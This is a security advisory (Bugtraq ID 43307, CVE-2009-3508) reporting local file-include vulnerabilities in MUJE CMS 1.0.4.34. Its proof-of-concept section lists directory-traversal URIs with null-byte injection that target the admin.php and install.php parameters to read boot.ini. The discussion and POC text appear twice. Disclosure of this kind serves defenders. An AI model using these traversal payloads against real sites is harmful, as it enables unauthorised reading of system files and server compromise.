MUJE CMS Multiple Local File Include Vulnerabilities
BID:43307
Info
MUJE CMS Multiple Local File Include Vulnerabilities
| Bugtraq ID: | 43307 |
| Class: | Input Validation Error |
| CVE: |
CVE-2009-3508 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 30 2009 12:00AM |
| Updated: | Jul 30 2009 12:00AM |
| Credit: | SirGod |
| Vulnerable: |
Muje CMS Muje CMS 1.0.4.34 |
| Not Vulnerable: | |
Discussion
MUJE CMS Multiple Local File Include Vulnerabilities
MUJE CMS is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
MUJE CMS 1.0.4.34 is vulnerable; other versions may also be affected.
MUJE CMS is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
MUJE CMS 1.0.4.34 is vulnerable; other versions may also be affected.
Exploit / POC
MUJE CMS Multiple Local File Include Vulnerabilities
Attackers can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/path/admin.php?_class=../../../../../../boot.ini%00
http://www.example.com/path/install/install.php?url=../../../../../../../boot.ini
http://www.example.com/path/admin.php?_htmlfile=../../../../../../boot.ini%00
Attackers can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/path/admin.php?_class=../../../../../../boot.ini%00
http://www.example.com/path/install/install.php?url=../../../../../../../boot.ini
http://www.example.com/path/admin.php?_htmlfile=../../../../../../boot.ini%00